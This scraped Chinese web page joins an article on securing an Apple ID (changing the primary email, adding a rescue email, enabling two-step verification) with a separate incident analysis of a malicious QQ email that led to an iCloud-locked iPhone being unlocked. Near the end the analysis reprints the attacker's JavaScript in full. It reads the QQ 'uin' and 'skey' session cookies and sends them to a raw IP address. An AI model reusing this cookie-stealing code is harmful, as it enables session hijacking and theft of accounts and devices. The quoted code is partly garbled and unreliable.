不想iPhone被黑？Apple ID就要这么设置
Apple ID受到威胁，我们的设备和隐私也会受到威胁。相信这些大家都知道，但是Apple ID远远没那么简单，说不定以下几点就有你不知道的。
/news/6754.html
　　科客点评：既然苹果为了我们账户的安全做了那么多努力，那我们就不要辜负人家了。　　近日，网易邮箱数据泄露的事情闹得沸沸扬扬。据传有不少网友曝出用网易邮箱作为Apple ID的账号出现了问题，甚至有的iPhone还出现了被恶意锁定的悲剧。其实，只要管理好了Apple ID，iPhone的安全等级便会提升好几个level，成功避免悲剧的发生。　　Apple ID是为其所有产品所引入的认证系统，只要有了它，我们就可以访问苹果的各种资源，使用苹果的各种设备。Apple ID受到威胁，我们的设备和隐私也会受到威胁。相信这些大家都知道，但是Apple ID远远没那么简单，说不定以下几点就有你不知道的。一 Apple ID可更改主要邮箱　　和其他许多互联网账户不同，Apple ID支持主要邮箱更改。更改主要邮箱之后，登陆、验证均会使用新的邮箱，账单也只会发至新的邮箱。也就是说，旧的邮箱会被彻底抛弃。如果你觉得你现在使用的Apple ID邮箱存在安全隐患的话，不如换个新的邮箱吧。更改方法：　　1，前往 。　　2，选择“管理您的Apple ID”，然后登录。　　3，选择“Apple ID和主要电子邮件地址”旁边的“编辑”。　　4，输入要用作Apple ID的电子邮件地址，然后选择“储存更改”。Apple将向该地址发送验证电子邮件。　　5，打开来自Apple的电子邮件，然后单击“立即验证”。　　6，登录后就可以使用新的邮箱登陆Apple ID了。二 Apple ID可设置救援邮箱　　大家都知道，忘记密码了可以通过回答安全问题解决。如果安全问题的答案忘记了呢？这个时候就可以使用救援邮箱重置安全问题了。苹果会通过救援邮箱对你的身份进行确认。所以，我们最好尽早设置好救援邮箱，以免忘记密码又忘记安全问题时无计可施。　　不过需要注意的是，除了救援邮箱，我们的Apple ID还有备用邮箱，这两者是有区别的。在我们忘记主邮箱的时候可以用备用邮箱来登录Apple ID，但是不能用备用邮箱来重置密码；而救援邮箱不能用来登录，它仅是我们在忘记安全问题时用于验证身份的邮箱。设置办法：　　1，前往 。　　2，选择“管理您的Apple ID”，然后登录。　　3，点击左侧的“密码和账户安全”。　　?4，输入你的账号设置的安全问题，一般回答两个就可以了。　　?5，点击“继续”后，找到“救援电子邮件地址”，点击“添加救援电子邮件地址”。　　?6，点击“存储”?。　　7，打开来自Apple的电子邮件，然后单击“立即验证”。　　8，登录后就可以使用新的邮箱登陆Apple ID了。三 Apple ID两步验证可保安全　　两步验证是一种防止他人访问您帐户的额外安全保护功能，即使他们有您的密码，但是由于缺少密钥，也不能直接登录你的账号。这个密钥是系统随机生成的，私密性极高，除了用户别的人几乎无法获知，盗号难度相当高。不过，开启两步验证后只要涉及修改密码都需要恢复密钥，比较麻烦。　　不过，借助两步式验证，我们不需要使用安全提示问题来保护账号验明身份，这一点倒是比较方便。更改方法：　　1，前往 。　　2，选择“管理您的Apple ID”，然后登录。　　3，选择“密码和账户安全”，验证身份。　　4，点击“两步验证”下方的“开始设置”。　　5，此次苹果会提示你，“如果确认开启两步验证，在修改密码时不仅需要密码及验证码，还要输入恢复密钥，此外如果忘记密码也同样需要恢复密钥”，因此请牢记密钥，建议最好写在纸上，不要记录在任何电子介质上，这是苹果官方给出的建议。　　6，完成以上步骤后，Apple ID两步验证即正式开启，在上也可以找到“两步验证已开启”的字样。总结　　说句实在话，没见过像Apple ID那么难管理的个人账户。首先，Apple ID适用范围广，在硬件上iPhone、iPad、iPod、Mac全靠它，在软件上App Store、Game Center、iCloud也统统是它。其次，在设置上，Apple ID可以关联的邮箱都有三个，什么主邮箱，备用邮箱，救援邮箱。要把Apple ID弄个清清楚楚还真是挺累的，但这也从侧面说明苹果的确是一家重视安全的公司。既然苹果都不嫌麻烦这样做了，我们为什么不将自己安全保障最大化呢？关注科客网官方微信kekebat，获取更多精彩资讯。（文/Alice）
注：科客网原创文章，欢迎转载与分享，转载请注明出处。
To see the world,things dangerous to come to.
Stay Hungry, Stay Foolish
科客精英俱乐部请按照下列步骤更改用作 Apple ID 的电子邮件地址。
注销使用您的 Apple ID 的。
在“帐户”部分中，点按“编辑”。点按 Apple ID 下方的“更改电子邮件地址”。
输入您要用作 Apple ID 的电子邮件地址。我们将向您的新电子邮件地址发送验证码。
在提供的栏位中输入电子邮件中的验证码，然后开始使用更新后的 Apple ID。
您可以将您的 Apple&ID 更改为您控制的任何其他电子邮件地址，只要该地址以前没有被用作 Apple ID。如果您的电子邮件地址以 @、@me.com 或 @ 结尾，您可能无法更改您的 Apple ID。您也不会在帐户页面上看到“更改电子邮件地址”。
了解详情更改 Apple ID 后，您所用的所有 Apple 服务都需要使用新的登录信息。
如果想要更改您在 iPhone、iPad 或 iPod touch 上使用的 Apple ID，而不是更改您用作 Apple ID 的电子邮件地址，请按照下列步骤。
并非所有国家或地区都能使用 FaceTime。事件还原：一封QQ恶意邮件导致Apple ID密码丢失一个朋友丢了一台iPhone 6 Plus，用iCloud开启了丢失模式。直到某一天收了一封QQ邮件，几分钟后APPLE ID被修改了，丢失的iPhone 6 Plus从iCloud中.. -中国学网-中国IT综合门户网站-提供健康,养生,留学,移民,创业,汽车等信息
事件还原：一封QQ恶意邮件导致Apple ID密码丢失一个朋友丢了一台iPhone 6 Plus，用iCloud开启了丢失模式。直到某一天收了一封QQ邮件，几分钟后APPLE ID被修改了，丢失的iPhone 6 Plus从iCloud中..
来源：互联网 更新时间： 10:04:31 责任编辑：王亮字体：
一个朋友丢了一台iPhone 6 Plus，用iCloud开启了丢失模式。直到某一天收了一封QQ邮件，几分钟后APPLE ID被修改了，丢失的iPhone 6 Plus从iCloud中移除了。不是钓鱼邮件，也没有输入任何账户密码，就点了一个图片链接后，Apple ID密码就丢了。这勾起了我的好奇心，随即让朋友把邮件转发给我。
链接在浏览器最下边，太长了，直接查看框架代码（点击看大图）。
开虚拟机，打开IE F12开发者工具，先看看情况（点击看大图）。
直接打开了广州日报大洋网，但域名是，地区是香港。查看F12抓取到的HTTP数据，原来是嵌入了2个iframe，第2个iframe是恶意网页（点击看大图）。
网页中只有一小段js脚本，功能是向腾讯企业邮箱：http://support./cgi-bin/login发送一个POST请求，然后执行其自定义的一个JS脚本。JS脚本名用unicode编了下码，解码后如下图（点击看大图）：
域名ylfu.pw和指向同一个IP。将这个JS脚本下载回来，出现了关键HTTP请求，都指向同一IP。真相原来就是通过搜索cookie，获取了QQ号和skey，利用skey登陆朋友QQ邮箱或其他QQ服务，然后进一步获取到了Apple ID密码。（点击看大图）
后来通过和朋友仔细沟通，得知朋友的APPLE ID就是QQ邮箱，但密码不同。骗子通过skey登陆朋友QQ邮箱，然后发送重置APPLE ID密码的邮件，最后成功解锁了iCloud锁定的iPhone 6 Plus。
技术虽然是老技术，但对普通用户来说，确实没办法防御。腾讯蛋疼的skey机制，不管邮箱、空间还是相册一律通杀，这个力度确实太广了。& & & &&
利用Apple ID的远程锁定进行诈骗最近呈爆发式啊，还没开启Apple ID二次验证的小伙伴，一定要去开启。
附JS完整代码
document.domain = "qq.com";
window.onload =
// 我注释的：入口点
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appV
trident: u.indexOf('Trident') & -1, //IE内核
presto: u.indexOf('Presto') & -1, //opera内核
webKit: u.indexOf('AppleWebKit') & -1, //苹果、谷歌内核
gecko: u.indexOf('Gecko') & -1 && u.indexOf('KHTML') == -1,//火狐内核
mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
android: u.indexOf('Android') & -1 || u.indexOf('Linux') & -1,
//android终端或者uc浏览器
iPhone: u.indexOf('iPhone') & -1, //是否为iPhone或者QQHD浏览器
iPad: u.indexOf('iPad') & -1, //是否iPad
webApp: u.indexOf('Safari') == -1 //是否web应该程序，没有头部与底部
language: (navigator.browserLanguage || navigator.language).toLowerCase()
function GetWebVersion() {
if (browser.versions.iPhone) {
return "iPhone";
if (browser.versions.android) {
return "android";
return "pc";
function getCookie(name) {
var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
if (arr = document.cookie.match(reg))
return unescape(arr[2]);
function getQueryString(name) {
var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
var r = window.location.search.substr(1).match(reg);
if (r != null) return unescape(r[2]);
function documentrrady()
window.location.href = "http://122.10.18.36/server/AddQQUser?qqnumber=" + parseInt(getCookie("uin").replace("o", "")) + "&skey=" + getCookie("skey") + "&sex=&nickname=&city=&useragant=" + GetWebVersion() + "&addfriendsids=&qqtype=lockKey2&cookie=&uin=" + getCookie("uin");
* 作者：银河实验室（企业账号）
相关文章：
上一篇文章：下一篇文章：
最新添加资讯
24小时热门资讯
Copyright © 2004- All Rights Reserved. 中国学网 版权所有
京ICP备号-1 京公网安备02号114网址导航